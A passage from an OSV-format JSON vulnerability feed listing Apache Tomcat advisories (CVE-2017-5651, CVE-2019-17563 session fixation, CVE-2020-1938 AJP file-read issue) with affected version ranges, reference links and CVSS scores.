"8.5.8", "8.5.9" ], "database_specific": { "last_known_affected_version_range": "\u003c= 8.5.12", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-9hg2-395j-83rm/GHSA-9hg2-395j-83rm.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { 
"introduced": "9.0.0.M1" }, { "fixed": "9.0.0.M19" } ] } ], "versions": [ "9.0.0.M1", "9.0.0.M10", "9.0.0.M11", "9.0.0.M13", "9.0.0.M15", "9.0.0.M17", "9.0.0.M18", "9.0.0.M3", "9.0.0.M4", "9.0.0.M6", "9.0.0.M8", "9.0.0.M9" ], "database_specific": { "last_known_affected_version_range": "\u003c= 9.0.0.M18", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-9hg2-395j-83rm/GHSA-9hg2-395j-83rm.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "8.5.0" }, { "fixed": "8.5.13" } ] } ], "versions": [ "8.5.0", "8.5.11", "8.5.12", "8.5.2", "8.5.3", "8.5.4", "8.5.5", "8.5.6", "8.5.8", "8.5.9" ], "database_specific": { "last_known_affected_version_range": "\u003c= 8.5.12", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-9hg2-395j-83rm/GHSA-9hg2-395j-83rm.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-5651" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/494429ca210641b6b7affe89a2b0a6c0ff70109b" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/9233d9d6a018be4415d4d7d6cb4fe01176adf1a8" }, { "type": "WEB", "url": "https://web.archive.org/web/20170420113605/http://www.securitytracker.com/id/1038219" }, { "type": "WEB", "url": "https://web.archive.org/web/20170417124228/http://www.securityfocus.com/bid/97544" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20180614-0001" }, { "type": "WEB", "url": "https://security.gentoo.org/glsa/201705-09" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r48c1444845fe15a823e1374674bfc297d5008a5453788099ea14caf0@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": 
"https://lists.apache.org/thread.html/r48c1444845fe15a823e1374674bfc297d5008a5453788099ea14caf0%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r3bbb800a816d0a51eccc5a228c58736960a9fffafa581a225834d97d@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r3bbb800a816d0a51eccc5a228c58736960a9fffafa581a225834d97d%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/eb6efa8d59c45a7a9eff94c4b925467d3b3fec8ba7697f3daa314b04@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/eb6efa8d59c45a7a9eff94c4b925467d3b3fec8ba7697f3daa314b04%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/b5e3f51d28cd5d9b1809f56594f2cf63dcd6a90429e16ea9f83bbedc@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/b5e3f51d28cd5d9b1809f56594f2cf63dcd6a90429e16ea9f83bbedc%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/88855876c33f2f9c532ffb75bfee570ccf0b17ffa77493745af9a17a@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/88855876c33f2f9c532ffb75bfee570ccf0b17ffa77493745af9a17a%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/6af47120905aa7d8fe12f42e8ff2284fb338ba141d3b77b8c7cb61b3@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/6af47120905aa7d8fe12f42e8ff2284fb338ba141d3b77b8c7cb61b3%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/6694538826b87522fb723d2dcedd537e14ebe0a381d92e5525a531d8@%3Cannounce.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/6694538826b87522fb723d2dcedd537e14ebe0a381d92e5525a531d8%40%3Cannounce.tomcat.apache.org%3E" }, { "type": "WEB", "url": 
"https://lists.apache.org/thread.html/5c0e00fd31efc11e147bf99d0f03c00a734447d3b131ab0818644cdb@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/5c0e00fd31efc11e147bf99d0f03c00a734447d3b131ab0818644cdb%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/343558d982879bf88ec20dbf707f8c11255f8e219e81d45c4f8d0551@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/343558d982879bf88ec20dbf707f8c11255f8e219e81d45c4f8d0551%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://github.com/search?q=repo%3Aapache%2Ftomcat+apache.coyote+path%3A%2F%5Eres%5C%2Fbnd%5C%2F%2F\u0026type=code" }, { "type": "PACKAGE", "url": "https://github.com/apache/tomcat" }, { "type": "WEB", "url": "https://bz.apache.org/bugzilla/show_bug.cgi?id=60918" }, { "type": "WEB", "url": "http://www.oracle.com/technetwork/security-advisory/cpujul2017-3236622.html" } ], "database_specific": { "cwe_ids": [ "CWE-440" ], "github_reviewed": true, "github_reviewed_at": "2022-07-01T13:44:41Z", "nvd_published_at": "2017-04-17T16:59:00Z", "severity": "CRITICAL" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-9xcj-c8cr-8c3c", "published": "2019-12-26T18:22:26Z", "modified": "2024-03-10T05:19:10.199468Z", "aliases": [ "CVE-2019-17563" ], "related": [ "CGA-76c4-v9xm-9m69" ], "summary": "In Apache Tomcat, when using FORM authentication there was a narrow window where an attacker could perform a session fixation attack", "details": "When using FORM authentication with Apache Tomcat 9.0.0.M1 to 9.0.29, 8.5.0 to 8.5.49 and 7.0.0 to 7.0.98 there was a narrow window where an attacker could perform a session fixation attack. 
The window was considered too narrow for an exploit to be practical but, erring on the side of caution, this issue has been treated as a security vulnerability.", "affected": [ { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "7.0.99" } ] } ], "versions": [ "7.0.0", "7.0.11", "7.0.12", "7.0.14", "7.0.16", "7.0.19", "7.0.2", "7.0.20", "7.0.21", "7.0.22", "7.0.23", "7.0.25", "7.0.26", "7.0.27", "7.0.28", "7.0.29", "7.0.30", "7.0.32", "7.0.33", "7.0.34", "7.0.35", "7.0.37", "7.0.39", "7.0.4", "7.0.40", "7.0.41", "7.0.42", "7.0.47", "7.0.5", "7.0.50", "7.0.52", "7.0.53", "7.0.54", "7.0.55", "7.0.56", "7.0.57", "7.0.59", "7.0.6", "7.0.61", "7.0.62", "7.0.63", "7.0.64", "7.0.65", "7.0.67", "7.0.68", "7.0.69", "7.0.70", "7.0.72", "7.0.73", "7.0.75", "7.0.76", "7.0.77", "7.0.78", "7.0.79", "7.0.8", "7.0.81", "7.0.82", "7.0.84", "7.0.85", "7.0.86", "7.0.88", "7.0.90", "7.0.91", "7.0.92", "7.0.93", "7.0.94", "7.0.96" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/12/GHSA-9xcj-c8cr-8c3c/GHSA-9xcj-c8cr-8c3c.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "8.0.0" }, { "fixed": "8.5.50" } ] } ], "versions": [ "8.0.1", "8.0.11", "8.0.12", "8.0.14", "8.0.15", "8.0.17", "8.0.18", "8.0.20", "8.0.21", "8.0.22", "8.0.23", "8.0.24", "8.0.26", "8.0.27", "8.0.28", "8.0.29", "8.0.3", "8.0.30", "8.0.32", "8.0.33", "8.0.35", "8.0.36", "8.0.37", "8.0.38", "8.0.39", "8.0.41", "8.0.42", "8.0.43", "8.0.44", "8.0.45", "8.0.46", "8.0.47", "8.0.48", "8.0.49", "8.0.5", "8.0.50", "8.0.51", "8.0.52", "8.0.53", "8.0.8", "8.0.9", "8.5.0", "8.5.11", "8.5.12", 
"8.5.13", "8.5.14", "8.5.15", "8.5.16", "8.5.19", "8.5.2", "8.5.20", "8.5.21", "8.5.23", "8.5.24", "8.5.27", "8.5.28", "8.5.29", "8.5.3", "8.5.30", "8.5.31", "8.5.32", "8.5.33", "8.5.34", "8.5.35", "8.5.37", "8.5.38", "8.5.39", "8.5.4", "8.5.40", "8.5.41", "8.5.42", "8.5.43", "8.5.45", "8.5.46", "8.5.47", "8.5.49", "8.5.5", "8.5.6", "8.5.8", "8.5.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/12/GHSA-9xcj-c8cr-8c3c/GHSA-9xcj-c8cr-8c3c.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "9.0.0" }, { "fixed": "9.0.30" } ] } ], "versions": [ "9.0.1", "9.0.10", "9.0.11", "9.0.12", "9.0.13", "9.0.14", "9.0.16", "9.0.17", "9.0.19", "9.0.2", "9.0.20", "9.0.21", "9.0.22", "9.0.24", "9.0.26", "9.0.27", "9.0.29", "9.0.4", "9.0.5", "9.0.6", "9.0.7", "9.0.8" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/12/GHSA-9xcj-c8cr-8c3c/GHSA-9xcj-c8cr-8c3c.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-17563" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujul2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2021.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuapr2020.html" }, { "type": "WEB", "url": "https://www.debian.org/security/2020/dsa-4680" }, { "type": "WEB", "url": "https://www.debian.org/security/2019/dsa-4596" }, { "type": "WEB", "url": "https://usn.ubuntu.com/4251-1" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20200107-0001" }, { "type": "WEB", "url": "https://security.gentoo.org/glsa/202003-43" }, { "type": "WEB", "url": "https://seclists.org/bugtraq/2019/Dec/43" }, { "type": "WEB", 
"url": "https://lists.debian.org/debian-lts-announce/2020/05/msg00026.html" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2020/01/msg00024.html" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/reb9a66f176df29b9a832caa95ebd9ffa3284e8f4922ec4fa3ad8eb2e@%3Cissues.cxf.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/raba0fabaf4d56d4325ab2aca8814f0b30a237ab83d8106b115ee279a@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r9136ff5b13e4f1941360b5a309efee2c114a14855578c3a2cbe5d19c@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r6ccee4e849bc77df0840c7f853f6bd09d426f6741247da2b7429d5d9@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r48c1444845fe15a823e1374674bfc297d5008a5453788099ea14caf0@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r3bbb800a816d0a51eccc5a228c58736960a9fffafa581a225834d97d@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/8b4c1db8300117b28a0f3f743c0b9e3f964687a690cdf9662a884bbd%40%3Cannounce.tomcat.apache.org%3E" }, { "type": "PACKAGE", "url": "https://github.com/apache/tomcat" }, { "type": "WEB", "url": "http://lists.opensuse.org/opensuse-security-announce/2020-01/msg00013.html" } ], "database_specific": { "cwe_ids": [ "CWE-384" ], "github_reviewed": true, "github_reviewed_at": "2019-12-26T18:22:01Z", "nvd_published_at": "2019-12-23T17:15:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-c9hw-wf7x-jp9j", "published": "2020-06-15T18:51:21Z", "modified": "2025-10-22T19:30:16.570842Z", "aliases": [ "BIT-tomcat-2020-1938", "CVE-2020-1938" ], "related": [ "CGA-w63f-vc82-fh9w" ], "summary": "Improper Privilege Management in Tomcat", "details": 
"When using the Apache JServ Protocol (AJP), care must be taken when trusting incoming connections to Apache Tomcat. Tomcat treats AJP connections as having higher trust than, for example, a similar HTTP connection. If such connections are available to an attacker, they can be exploited in ways that may be surprising. In Apache Tomcat 9.0.0.M1 to 9.0.0.30, 8.5.0 to 8.5.50 and 7.0.0 to 7.0.99, Tomcat shipped with an AJP Connector enabled by default that listened on all configured IP addresses. It was expected (and recommended in the security guide) that this Connector would be disabled if not required. This vulnerability report identified a mechanism that allowed: returning arbitrary files from anywhere in the web application, processing any file in the web application as a JSP. Further, if the web application allowed file upload and stored those files within the web application (or the attacker was able to control the content of the web application by some other means) then this, along with the ability to process a file as a JSP, made remote code execution possible. It is important to note that mitigation is only required if an AJP port is accessible to untrusted users. Users wishing to take a defence-in-depth approach and block the vector that permits returning arbitrary files and execution as JSP may upgrade to Apache Tomcat 9.0.31, 8.5.51 or 7.0.100 or later. A number of changes were made to the default AJP Connector configuration in 9.0.31 to harden the default configuration. 
It is likely that users upgrading to 9.0.31, 8.5.51 or 7.0.100 or later will need to make small changes to their configurations.", "affected": [ { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "9.0.0" }, { "fixed": "9.0.31" } ] } ], "versions": [ "9.0.1", "9.0.10", "9.0.11", "9.0.12", "9.0.13", "9.0.14", "9.0.16", "9.0.17", "9.0.19", "9.0.2", "9.0.20", "9.0.21", "9.0.22", "9.0.24", "9.0.26", "9.0.27", "9.0.29", "9.0.30", "9.0.4", "9.0.5", "9.0.6", "9.0.7", "9.0.8" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/06/GHSA-c9hw-wf7x-jp9j/GHSA-c9hw-wf7x-jp9j.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "8.0.0" }, { "fixed": "8.5.51" } ] } ], "versions": [ "8.0.1", "8.0.11", "8.0.12", "8.0.14", "8.0.15", "8.0.17", "8.0.18", "8.0.20", "8.0.21", "8.0.22", "8.0.23", "8.0.24", "8.0.26", "8.0.27", "8.0.28", "8.0.29", "8.0.3", "8.0.30", "8.0.32", "8.0.33", "8.0.35", "8.0.36", "8.0.37", "8.0.38", "8.0.39", "8.0.41", "8.0.42", "8.0.43", "8.0.44", "8.0.45", "8.0.46", "8.0.47", "8.0.48", "8.0.49", "8.0.5", "8.0.50", "8.0.51", "8.0.52", "8.0.53", "8.0.8", "8.0.9", "8.5.0", "8.5.11", "8.5.12", "8.5.13", "8.5.14", "8.5.15", "8.5.16", "8.5.19", "8.5.2", "8.5.20", "8.5.21", "8.5.23", "8.5.24", "8.5.27", "8.5.28", "8.5.29", "8.5.3", "8.5.30", "8.5.31", "8.5.32", "8.5.33", "8.5.34", "8.5.35", "8.5.37", "8.5.38", "8.5.39", "8.5.4", "8.5.40", "8.5.41", "8.5.42", "8.5.43", "8.5.45", "8.5.46", "8.5.47", "8.5.49", "8.5.5", "8.5.50", "8.5.6", "8.5.8", "8.5.9" ], "database_specific": { "source": 
"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/06/GHSA-c9hw-wf7x-jp9j/GHSA-c9hw-wf7x-jp9j.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "7.0.0" }, { "fixed": "7.0.100" } ] } ], "versions": [ "7.0.0", "7.0.11", "7.0.12", "7.0.14", "7.0.16", "7.0.19", "7.0.2", "7.0.20", "7.0.21", "7.0.22", "7.0.23", "7.0.25", "7.0.26", "7.0.27", "7.0.28", "7.0.29", "7.0.30", "7.0.32", "7.0.33", "7.0.34", "7.0.35", "7.0.37", "7.0.39", "7.0.4", "7.0.40", "7.0.41", "7.0.42", "7.0.47", "7.0.5", "7.0.50", "7.0.52", "7.0.53", "7.0.54", "7.0.55", "7.0.56", "7.0.57", "7.0.59", "7.0.6", "7.0.61", "7.0.62", "7.0.63", "7.0.64", "7.0.65", "7.0.67", "7.0.68", "7.0.69", "7.0.70", "7.0.72", "7.0.73", "7.0.75", "7.0.76", "7.0.77", "7.0.78", "7.0.79", "7.0.8", "7.0.81", "7.0.82", "7.0.84", "7.0.85", "7.0.86", "7.0.88", "7.0.90", "7.0.91", "7.0.92", "7.0.93", "7.0.94", "7.0.96", "7.0.99" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/06/GHSA-c9hw-wf7x-jp9j/GHSA-c9hw-wf7x-jp9j.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-1938" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/re5eecbe5bf967439bafeeaa85987b3a43f0e6efe06b6976ee768cde2@%3Cusers.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/re5eecbe5bf967439bafeeaa85987b3a43f0e6efe06b6976ee768cde2%40%3Cusers.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rd50baccd1bbb96c2327d5a8caa25a49692b3d68d96915bd1cfbb9f8b@%3Cusers.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rd50baccd1bbb96c2327d5a8caa25a49692b3d68d96915bd1cfbb9f8b%40%3Cusers.tomcat.apache.org%3E" }, { "type": "WEB", 
"url": "https://lists.apache.org/thread.html/rd0774c95699d5aeb5e16e9a600fb2ea296e81175e30a62094e27e3e7@%3Ccommits.ofbiz.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rd0774c95699d5aeb5e16e9a600fb2ea296e81175e30a62094e27e3e7%40%3Ccommits.ofbiz.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rce2af55f6e144ffcdc025f997eddceb315dfbc0b230e3d750a7f7425@%3Cnotifications.ofbiz.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rce2af55f6e144ffcdc025f997eddceb315dfbc0b230e3d750a7f7425%40%3Cnotifications.ofbiz.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rcd5cd301e9e7e39f939baf2f5d58704750be07a5e2d3393e40ca7194@%3Ccommits.tomee.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rcd5cd301e9e7e39f939baf2f5d58704750be07a5e2d3393e40ca7194%40%3Ccommits.tomee.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rc068e824654c4b8bd4f2490bec869e29edbfcd5dfe02d47cbf7433b2@%3Cdev.tomee.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rc068e824654c4b8bd4f2490bec869e29edbfcd5dfe02d47cbf7433b2%40%3Cdev.tomee.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rbdb1d2b651a3728f0ceba9e0853575b6f90296a94a71836a15f7364a@%3Cdev.tomee.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rbdb1d2b651a3728f0ceba9e0853575b6f90296a94a71836a15f7364a%40%3Cdev.tomee.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rb2fc890bef23cbc7f343900005fe1edd3b091cf18dada455580258f9@%3Cusers.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rb2fc890bef23cbc7f343900005fe1edd3b091cf18dada455580258f9%40%3Cusers.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rb1c0fb105ce2b93b7ec6fc1b77dd208022621a91c12d1f580813cfed@%3Cdev.tomcat.apache.org%3E" 
}, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rb1c0fb105ce2b93b7ec6fc1b77dd208022621a91c12d1f580813cfed%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rad36ec6a1ffc9e43266b030c22ceeea569243555d34fb4187ff08522@%3Cnotifications.ofbiz.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rad36ec6a1ffc9e43266b030c22ceeea569243555d34fb4187ff08522%40%3Cnotifications.ofbiz.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ra7092f7492569b39b04ec0decf52628ba86c51f15efb38f5853e2760@%3Cnotifications.ofbiz.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ra7092f7492569b39b04ec0decf52628ba86c51f15efb38f5853e2760%40%3Cnotifications.ofbiz.apache.org%3E" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujul2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2021.html" }, { "type": "WEB", "url": "https://www.debian.org/security/2020/dsa-4680" }, { "type": "WEB", "url": "https://www.debian.org/security/2020/dsa-4673" }, { "type": "WEB", "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2020-1938" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20200226-0002" }, { "type": "WEB", "url": "https://security.gentoo.org/glsa/202003-43" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/L46WJIV6UV3FWA5O5YEY6XLA73RYD53B" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/K3IPNHCKFVUKSHDTM45UL4Q765EHHTFG" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/2XFLQB3O5QVP4ZBIPVIXBEZV7F2R7ZMS" }, { "type": "WEB", "url": 
"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/L46WJIV6UV3FWA5O5YEY6XLA73RYD53B" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/K3IPNHCKFVUKSHDTM45UL4Q765EHHTFG" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/2XFLQB3O5QVP4ZBIPVIXBEZV7F2R7ZMS" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2020/05/msg00026.html" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2020/03/msg00006.html" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rf992c5adf376294af31378a70aa8a158388a41d7039668821be28df3@%3Ccommits.tomee.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rf992c5adf376294af31378a70aa8a158388a41d7039668821be28df3%40%3Ccommits.tomee.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rf26663f42e7f1a1d1cac732469fb5e92c89908a48b61ec546dbb79ca@%3Cbugs.httpd.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rf26663f42e7f1a1d1cac732469fb5e92c89908a48b61ec546dbb79ca%40%3Cbugs.httpd.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rf1bbc0ea4a9f014cf94df9a12a6477d24a27f52741dbc87f2fd52ff2@%3Cissues.geode.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rf1bbc0ea4a9f014cf94df9a12a6477d24a27f52741dbc87f2fd52ff2%40%3Cissues.geode.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r5e2f1201b92ee05a0527cfc076a81ea0c270be299b87895c0ddbe02b%40%3Cusers.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r57f5e4ced436ace518a9e222fabe27fb785f09f5bf974814cc48ca97@%3Ccommits.tomee.apache.org%3E" }, { "type": "WEB", "url": 
"https://lists.apache.org/thread.html/r57f5e4ced436ace518a9e222fabe27fb785f09f5bf974814cc48ca97%40%3Ccommits.tomee.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r549b43509e387a42656f0641fa311bf27c127c244fe02007d5b8d6f6@%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r549b43509e387a42656f0641fa311bf27c127c244fe02007d5b8d6f6%40%3Cdev.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r4f86cb260196e5cfcbbe782822c225ddcc70f54560f14a8f11c6926f@%3Cusers.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r4f86cb260196e5cfcbbe782822c225ddcc70f54560f14a8f11c6926f%40%3Cusers.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r4afa11e0464408e68f0e9560e90b185749363a66398b1491254f7864@%3Cusers.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r4afa11e0464408e68f0e9560e90b185749363a66398b1491254f7864%40%3Cusers.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r47caef01f663106c2bb81d116b8380d62beac9e543dd3f3bc2c2beda@%3Ccommits.tomee.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r47caef01f663106c2bb81d116b8380d62beac9e543dd3f3bc2c2beda%40%3Ccommits.tomee.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r43faacf64570b1d9a4bada407a5af3b2738b0c007b905f1b6b608c65@%3Cusers.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r43faacf64570b1d9a4bada407a5af3b2738b0c007b905f1b6b608c65%40%3Cusers.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r38a5b7943b9a62ecb853acc22ef08ff586a7b3c66e08f949f0396ab1@%3Cusers.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r38a5b7943b9a62ecb853acc22ef08ff586a7b3c66e08f949f0396ab1%40%3Cusers.tomcat.apache.org%3E" }, { 
"type": "WEB", "url": "https://lists.apache.org/thread.html/r17aaa3a05b5b7fe9075613dd0c681efa60a4f8c8fbad152c61371b6e@%3Cusers.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r17aaa3a05b5b7fe9075613dd0c681efa60a4f8c8fbad152c61371b6e%40%3Cusers.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r1125f3044a0946d1e7e6f125a6170b58d413ebd4a95157e4608041c7@%3Cannounce.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r1125f3044a0946d1e7e6f125a6170b58d413ebd4a95157e4608041c7%40%3Cannounce.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r089dc67c0358a1556dd279c762c74f32d7a254a54836b7ee2d839d8e@%3Cdev.tomee.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r089dc67c0358a1556dd279c762c74f32d7a254a54836b7ee2d839d8e%40%3Cdev.tomee.apache.org%3E" }, { "type": "PACKAGE", "url": "https://github.com/apache/tomcat" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r9f119d9ce9239114022e13dbfe385b3de7c972f24f05d6dbd35c1a2f@%3Cusers.tomcat.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r9f119d9ce9239114022e13dbfe385b3de7c972f24f05d6dbd35c1a2f%40%3Cusers.tomcat.apache.org%3E" }, { 